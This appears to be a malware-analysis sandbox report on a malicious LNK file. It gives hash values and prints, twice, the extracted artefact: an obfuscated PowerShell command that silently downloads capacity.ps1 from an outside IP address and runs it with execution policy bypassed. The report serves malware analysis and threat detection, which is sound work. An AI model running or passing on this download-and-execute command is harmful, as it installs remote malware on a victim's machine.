General
Structural Analysis
Config.0
Yara Rules17
Sync
Community
Infection Chain
Summary by MalvaGPT
Characteristics
|
Hash | Hash Value |
|---|---|
| MD5 | b72baa66fb35df5bb4618541e81976a5
|
| Sha1 | f3b3517607a8ffe9c113d419f45086e127960a0f
|
| Sha256 | c543a9c2ab6349444795f2493ce6b7027a3bf0b3e3d0bfdd078a291de7a7e7bd
|
| Sha384 | ad57741e17a3f70db1a6f2e4b8aed8595045cf817e9ff642dde519e146a06f7f7e56e8401ce882d559a040c38cf6ef94
|
| Sha512 | 9a85e3e0d6fdb31a14f63e7d371e2b1b5392cf5b1aab65eb18a1472d02050edace7ff046bb36ee5e4a4d3ec3d39e14744157458904823b3c15c43f90421eaac8
|
| SSDeep | 12:8d/V7OlK0ocgeWVUcFYg4Scgo6LWs8XcPLL9LBniY2X0pjbgQFy/9fpDA40DLaOC:8d/V7OVg3TYgfyMPVVij4jbgQAAGOq
|
| TLSH | ACF3483466F50300F1F37B3CB933B75049AE754DDE2187CC00A0D61C5922E64E965B3A
|
File Structure
b72baa66fb35df5bb4618541e81976a5
Malicious
Artefacts
|
Name0 | Value |
|---|---|
| LNK: Command Execution | powershell.exe -win 1 iwr -uri htt''p://14''6''.''185.23''9''.8/so4nik/capacity.ps1 -OutFile capacity.ps1; powershell.exe -noprofile -executionpolicy bypass -file "$env:localappdata\capacity.ps1" |
b72baa66fb35df5bb4618541e81976a5 (166.35 KB)
File Structure
b72baa66fb35df5bb4618541e81976a5
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
|
Name0 | Value | Location |
|---|---|---|
| LNK: Command Execution | powershell.exe -win 1 iwr -uri htt''p://14''6''.''185.23''9''.8/so4nik/capacity.ps1 -OutFile capacity.ps1; powershell.exe -noprofile -executionpolicy bypass -file "$env:localappdata\capacity.ps1" Malicious |
b72baa66fb35df5bb4618541e81976a5 |
You must be signed in to post a comment.
You need a premium account to access this feature.
You must be signed in to post a comment.